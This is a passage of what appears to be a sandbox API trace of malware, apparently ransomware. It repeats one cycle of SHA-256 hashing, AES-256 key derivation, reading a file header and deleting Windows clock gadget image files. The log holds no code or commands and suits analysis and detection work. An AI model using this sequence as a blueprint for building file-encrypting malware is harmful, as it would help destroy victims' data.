CryptDestroyKey (hKey=0x284d568) returned 1 [0186.740] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.742] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png")) returned 0 [0186.743] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.743] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.743] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.743] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.743] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x132 [0186.744] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.746] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.746] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.746] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.749] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png")) returned 0 [0186.753] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.754] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.754] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.754] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.754] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17d [0186.754] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.756] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.756] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.756] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.758] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png")) returned 0 [0186.759] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.760] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.760] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.760] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.760] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b2 [0186.760] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.762] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.762] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.762] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.764] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png")) returned 0 [0186.766] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.767] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.767] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.767] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.767] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc63 [0186.767] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.774] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.774] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.774] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.776] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png")) returned 0 [0186.777] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.778] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.778] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.778] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.778] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7454 [0186.778] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.783] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.783] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.783] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.785] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png")) returned 0 [0186.787] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.787] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.787] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.787] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.787] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x77b1 [0186.788] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.793] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.793] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.794] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.795] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png")) returned 0 [0186.796] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.797] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.797] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.797] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.797] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb80 [0186.797] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.875] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.875] CryptDestroyKey (hKey=0x284d568) returned 1 [0186.875] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.889] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_dot.png")) returned 0 [0187.289] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.290] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.290] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.290] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.290] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x170 [0187.290] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.292] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.292] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.292] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.293] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_h.png")) returned 0 [0187.293] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.294] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.294] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.294] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.294] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x192 [0187.294] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.296] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.296] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.296] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.297] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_m.png")) returned 0 [0187.304] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.305] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.305] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.305] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.305] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb8c [0187.305] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.320] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.320] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.320] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.322] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_s.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_s.png")) returned 0 [0187.322] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.323] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.323] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.323] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.323] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7fb7 [0187.323] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.347] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.347] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.347] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.348] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_settings.png")) returned 0 [0187.350] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.351] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.351] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.351] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.351] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x876e [0187.351] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.395] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.395] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.395] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.396] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower.png")) returned 0 [0187.397] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.398] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.398] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.398] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.398] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x141 [0187.398] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.400] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.400] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.400] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.401] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_dot.png")) returned 0 [0187.405] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.405] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.405] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.405] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.405] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x184 [0187.405] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.407] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.407] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.407] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.408] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_h.png")) returned 0 [0187.409] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.409] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.409] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.409] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.410] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b7 [0187.410] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.411] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.411] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.411] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.412] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_m.png")) returned 0 [0187.413] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.414] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.414] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.414] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.414] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc14 [0187.414] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.434] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.434] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.434] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.435] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_s.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_s.png")) returned 0 [0187.435] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.436] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.436] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.436] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.436] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x827b [0187.436] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.440] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.440] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.440] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.442] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_settings.png")) returned 0 [0187.443] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.444] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.444] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.444] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.444] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3cfe [0187.444] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.456] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.456] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.456] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.457] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern.png")) returned 0 [0187.458] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.458] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.458] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.458] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.458] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb96 